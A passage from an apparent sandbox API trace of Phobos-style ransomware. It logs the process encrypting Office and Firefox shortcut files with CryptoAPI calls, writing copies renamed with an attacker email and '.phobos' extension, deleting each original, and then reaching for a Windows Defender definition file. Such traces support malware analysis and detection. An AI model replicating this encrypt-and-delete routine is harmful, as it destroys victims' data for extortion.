CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.287] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Publisher 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft publisher 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.288] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3041) returned 1 [0177.288] CloseHandle (hObject=0x190) returned 1 [0177.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Publisher 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft publisher 2010.lnk")) returned 0x20 [0177.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Publisher 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft publisher 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.288] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Publisher 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft publisher 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.288] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.288] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.288] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Publisher 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft publisher 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0177.289] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0177.289] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.289] ReadFile (in: hFile=0x190, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xbe1, lpOverlapped=0x0) returned 1 [0177.291] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xbf0, dwBufLen=0xbf0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xbf0) returned 1 [0177.291] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xbf0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xbf0, lpOverlapped=0x0) returned 1 [0177.292] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ba8) returned 1 [0177.292] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.292] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0177.292] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.292] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0177.292] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.292] CloseHandle (hObject=0x190) returned 1 [0177.292] CloseHandle (hObject=0x158) returned 1 [0177.293] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Publisher 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft publisher 2010.lnk")) returned 1 [0177.294] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.294] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft SharePoint Workspace 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft sharepoint workspace 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0177.295] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3055) returned 1 [0177.295] CloseHandle (hObject=0x158) returned 1 [0177.295] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft SharePoint Workspace 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft sharepoint workspace 2010.lnk")) returned 0x20 [0177.295] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft SharePoint Workspace 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft sharepoint workspace 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.295] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft SharePoint Workspace 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft sharepoint workspace 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0177.295] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.295] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.295] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft SharePoint Workspace 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft sharepoint workspace 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.296] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0177.296] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.296] ReadFile (in: hFile=0x158, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xbef, lpOverlapped=0x0) returned 1 [0177.305] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xbf0, dwBufLen=0xbf0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xbf0) returned 1 [0177.306] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xbf0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xbf0, lpOverlapped=0x0) returned 1 [0177.307] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ba8) returned 1 [0177.307] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.307] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0177.307] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.307] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0177.307] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.307] CloseHandle (hObject=0x158) returned 1 [0177.307] CloseHandle (hObject=0x190) returned 1 [0177.307] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft SharePoint Workspace 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft sharepoint workspace 2010.lnk")) returned 1 [0177.309] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.309] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Visio 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft visio 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.309] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2767) returned 1 [0177.309] CloseHandle (hObject=0x190) returned 1 [0177.309] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Visio 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft visio 2010.lnk")) returned 0x20 [0177.309] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Visio 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft visio 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.309] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Visio 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft visio 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.309] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.310] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.310] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Visio 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft visio 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0177.310] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0177.310] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.310] ReadFile (in: hFile=0x190, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xacf, lpOverlapped=0x0) returned 1 [0177.312] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xad0, dwBufLen=0xad0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xad0) returned 1 [0177.312] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xad0, lpOverlapped=0x0) returned 1 [0177.312] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ba8) returned 1 [0177.312] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.312] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0177.312] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.312] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0177.313] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.313] CloseHandle (hObject=0x190) returned 1 [0177.313] CloseHandle (hObject=0x158) returned 1 [0177.313] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Visio 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft visio 2010.lnk")) returned 1 [0177.314] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.314] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Word 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft word 2010.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0177.315] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3021) returned 1 [0177.315] CloseHandle (hObject=0x158) returned 1 [0177.315] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Word 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft word 2010.lnk")) returned 0x20 [0177.315] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Word 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft word 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.315] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Word 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft word 2010.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0177.315] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.315] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.315] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Word 2010.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft word 2010.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.316] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0177.316] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.316] ReadFile (in: hFile=0x158, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xbcd, lpOverlapped=0x0) returned 1 [0177.318] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xbd0, dwBufLen=0xbd0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xbd0) returned 1 [0177.318] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xbd0, lpOverlapped=0x0) returned 1 [0177.319] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ba8) returned 1 [0177.319] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.319] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0177.319] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0177.319] WriteFile (in: hFile=0x190, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0177.319] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.319] CloseHandle (hObject=0x158) returned 1 [0177.319] CloseHandle (hObject=0x190) returned 1 [0177.320] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Word 2010.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\microsoft office\\microsoft word 2010.lnk")) returned 1 [0177.323] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.323] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Mozilla Firefox.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\mozilla firefox.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.324] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1169) returned 1 [0177.324] CloseHandle (hObject=0x190) returned 1 [0177.324] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Mozilla Firefox.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\mozilla firefox.lnk")) returned 0x20 [0177.324] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Mozilla Firefox.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\mozilla firefox.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0177.324] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Mozilla Firefox.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\mozilla firefox.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0177.324] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.324] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0177.324] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Mozilla Firefox.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\mozilla firefox.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0177.325] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32968) returned 1 [0177.325] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.325] ReadFile (in: hFile=0x190, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x491, lpOverlapped=0x0) returned 1 [0177.533] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4a0, dwBufLen=0x4a0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4a0) returned 1 [0177.533] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4a0, lpOverlapped=0x0) returned 1 [0177.534] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32da8) returned 1 [0177.534] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0177.534] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0177.534] CryptDestroyKey (hKey=0xa32da8) returned 1 [0177.534] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0177.534] CryptDestroyKey (hKey=0xa32968) returned 1 [0177.535] CloseHandle (hObject=0x190) returned 1 [0177.535] CloseHandle (hObject=0x158) returned 1 [0177.535] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Mozilla Firefox.lnk" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\mozilla firefox.lnk")) returned 1 [0177.537] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0177.537] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0177.537] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=339344) returned 1 [0177.537] CloseHandle (hObject=0x158) returned 1 [0177.537] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm" (normalized: "c:\\programdata\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm")) returned 0x2020 [0177.537] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Definition 